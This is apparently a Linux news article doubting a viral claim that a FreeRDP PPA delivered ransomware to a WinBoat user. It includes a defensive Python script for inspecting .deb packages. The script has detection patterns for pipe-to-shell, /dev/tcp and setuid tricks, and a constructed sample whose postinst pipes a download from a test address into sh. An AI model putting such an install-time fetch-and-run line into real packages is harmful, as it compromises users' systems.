Hysteria is contagious online. One person’s worry becomes another’s conviction, and that belief hardens — the thrill of righteous outrage is addictive! This week saw claims a PPA is being used to distribute Linux ransomware go wild online — but is it true?

The story is a bit long, and a bit dry, but it goes like this:

A user said they tried to install WinBoat (a tool for running Windows apps on Linux) but it wouldn’t connect to FreeRDP. So they tried FreeRDP from different sources, to no avail. Then, they saw a comment on GitHub about a custom FreeRDP PPA.

They added the random PPA, and voilà: things appeared to work.

At this point, there was no sign of ransomware, encrypted home directories or anything untoward.

They began to install Windows in WinBoat, then left their PC alone for a day or so. When they returned to their PC (which hadn’t been used in the meantime) they found their home directory encrypted and the system ‘infected with ransomware’.

Their conclusion was that the PPA was to blame.

They took to Reddit to warn people about the version of FreeRDP in this PPA. From there, the online Outrage Industrial Complex® took over and, with little concrete evidence to back it up, the PPA was cast as villain and panic spread.

Canonical was informed, and it pulled the PPA in question (though not before a few people had downloaded its contents), while the GitHub account of the person who maintains the packages within it was reported and, apparently, promptly banned.

The inconvenient bit

Assumption is not proof. Though Linux ransomware exists, it is rare. If a PPA really were being used to distribute it, unbeknown to its users, that would be as novel as it is worrying. Naturally, calmer heads online were curious and wanted to find out more.

What sort of ransomware? How sophisticated (or not)? Any hallmarks of who is behind it, the servers it talks to, where it came from, etc.

With scant detail from the OP (who had hosed their system), some folks concerned by the idea decided (or should that be DEB-cided?) to do the obvious thing and actually take a look at the contents of the packages in the PPA.

And they found…

Nothing.

One reported: “I investigated the binary and some of the libraries it uses and I’ve failed to see anything suspicious. No weird files being opened, nothing interesting. I also can’t find the payload.”

The same with others who examined the files.
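If you want to do what those people did, the place to start is the package itself rather than the binary: the maintainer scripts (preinst, postinst, prerm, postrm) are run by dpkg as root at install time, so they are the obvious place for a malicious package to drop or fetch a payload, and the payload tarball is where a setuid binary would live. The following is an added example for this article, not code from the PPA, WinBoat, FreeRDP, dpkg or anyone quoted above. It parses a .deb (an ar archive holding debian-binary, control.tar.* and data.tar.*) with only the Python standard library and applies a handful of illustrative grep-style heuristics. The package it inspects is constructed inline, including the invented address 198.51.100.7, so it runs offline; a real package would be opened with the same `inspect_deb()` call on its bytes.

```python
"""Offline inspection of a Debian .deb: list payload files, pull out the maintainer
scripts, and flag lines worth a manual read. Added example for this article; not code
from the PPA, WinBoat, FreeRDP or dpkg. The heuristics are illustrative, not a verdict."""
import io
import re
import stat
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Patterns that, in a script dpkg runs as root at install time, justify a closer look.
SUSPICIOUS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "bash_tcp_socket": re.compile(r"/dev/tcp/"),
    "persistence": re.compile(r"\b(crontab|systemctl\s+enable)\b"),
    "setuid_chmod": re.compile(r"\bchmod\s+(?:[ugoa]*\+s|[2467][0-7]{3})\b"),
}

def parse_ar(blob):
    """Yield (member name, bytes) for each entry of an ar archive, the outer .deb container.
    Header layout: name(16) mtime(12) uid(6) gid(6) mode(8) size(10) "`\\n"(2) = 60 bytes."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip(" /")
        size = int(hdr[48:58].decode("ascii").strip())
        pos += 60
        yield name, blob[pos:pos + size]
        pos += size + (size % 2)  # member data is padded to an even offset

def _tar_members(data):
    """Iterate (TarInfo, content) over a possibly compressed tar held in memory."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            yield m, (tf.extractfile(m).read() if m.isfile() else b"")

def inspect_deb(blob):
    """Return a report: ar members, payload files, setuid/setgid files, maintainer
    scripts, and (script, line number, pattern, line) tuples for flagged lines."""
    members = dict(parse_ar(blob))
    control = next(v for k, v in members.items() if k.startswith("control.tar"))
    payload = next(v for k, v in members.items() if k.startswith("data.tar"))
    report = {"members": sorted(members), "files": [], "setuid": [], "scripts": {}, "findings": []}
    for m, content in _tar_members(control):
        name = m.name.lstrip("./")
        if name not in MAINTAINER_SCRIPTS:
            continue
        text = content.decode("utf-8", errors="replace")
        report["scripts"][name] = text
        for lineno, line in enumerate(text.splitlines(), 1):
            for label, rx in SUSPICIOUS.items():
                if rx.search(line):
                    report["findings"].append((name, lineno, label, line.strip()))
    for m, _ in _tar_members(payload):
        if not m.isfile():
            continue
        path = m.name.lstrip("./")
        report["files"].append(path)
        if m.mode & (stat.S_ISUID | stat.S_ISGID):  # setuid/setgid in the payload itself
            report["setuid"].append(path)
    return report

def build_targz(files):
    """Build a gzip'd tar from {path: (mode, bytes)}; used only to construct the sample."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, content) in files.items():
            ti = tarfile.TarInfo(path)
            ti.size, ti.mode = len(content), mode
            tf.addfile(ti, io.BytesIO(content))
    return buf.getvalue()

def build_ar(members):
    """Build an ar archive from [(name, bytes)]; used only to construct the sample."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)

# Constructed sample: looks like a FreeRDP build, but its postinst also pipes a download
# into sh and the binary ships setuid. Invented for this example (198.51.100.7 is TEST-NET-2).
CONTROL = b"Package: freerdp3-x11\nVersion: 3.0.0-1~ppa1\nArchitecture: amd64\n"
POSTINST = b"#!/bin/sh\nset -e\nldconfig\ncurl -fsSL http://198.51.100.7/setup.sh | sh\nexit 0\n"
SAMPLE_DEB = build_ar([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", build_targz({"./control": (0o644, CONTROL), "./postinst": (0o755, POSTINST)})),
    ("data.tar.gz", build_targz({"./usr/bin/xfreerdp": (0o4755, b"\x7fELF placeholder")})),
])

if __name__ == "__main__":
    r = inspect_deb(SAMPLE_DEB)
    print("members:", r["members"])
    print("payload:", r["files"], "setuid/setgid:", r["setuid"])
    for script, lineno, label, line in r["findings"]:
        print(f"{script}:{lineno} [{label}] {line}")
```

On the constructed sample the report flags `postinst` line 4 (the pipe to sh) and the setuid `usr/bin/xfreerdp`; on a package with a plain `ldconfig` postinst and ordinary file modes it returns an empty findings list, which is the outcome the people quoted above reported. The patterns are a prompt to read the scripts by hand, not proof of anything either way, and they say nothing about a backdoor compiled into the binary itself, which is why the next step on a real package is comparing it against the upstream source it claims to be built from. The equivalent manual commands on an installed system are `dpkg-deb -e` for the control tarball and `dpkg-deb -c` for the payload listing.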

Surely there couldn’t be something more obvious to blame?

Emotion in the driving seat

I can’t lie: finding your Linux PC in an unexpected state (by which I don’t mean it’s covered in cat sick) is troubling. Concern, panic and a desire to warn others is understandable. When it comes to security, heightened sensitivity is forgivable.

But, clearly, the need for evidence ought to be paramount, and shouldn’t take a backseat to emotion.

Given that the infected setup involves running a full copy of Windows (a magnet for malware) as a virtual machine inside a Docker container, accessed through FreeRDP and then "integrated" into the Linux desktop, is a PPA even the most likely culprit?

Some have suggested that Makop, a piece of ransomware aimed at Windows that spreads via exposed RDP, could be to blame; others note that, given how WinBoat's Linux integration works, it is feasible for Windows malware running in the guest to encrypt folders on the Linux host.

Beyond that, WinBoat is designed to fetch packages from remote servers (which often then fetch from mirrors) to support its Windows app running capabilities. It is not a leap to ask whether that route might have been compromised.

Panic over?

The original reporter has since said that the “infection did not appear immediately after compiling or running WinBoat or FreeRDP”, and that “the exact entry point remains unclear”.

They also say they did not mean to "start a witch hunt", and have publicly apologised to the developer whose GitHub account was banned as a result of the furore. The PPA Canonical pulled? That is still offline while its engineers vet its contents.

It’ll be interesting to see what they find — if anything.

The thing that worries me? The immediacy with which this snowballed on emotion rather than evidence, to the point that a person's GitHub developer account was allegedly1 banned by automated systems responding to an influx of reports.

That sort of outrage could be weaponised. With many critical open-source projects (which power major infrastructure) resting solely on the shoulders of a single developer who does it for the love of it, that is scarier than PPA phantomware.

  1. The GitHub account that was reportedly banned (and whose banning the OP apologised for having inadvertently helped bring about) is actually still live, so… Maybe this will go REALLY Reddit and turn out to be some kind of meta conspiracy between two devs duking it out. ↩︎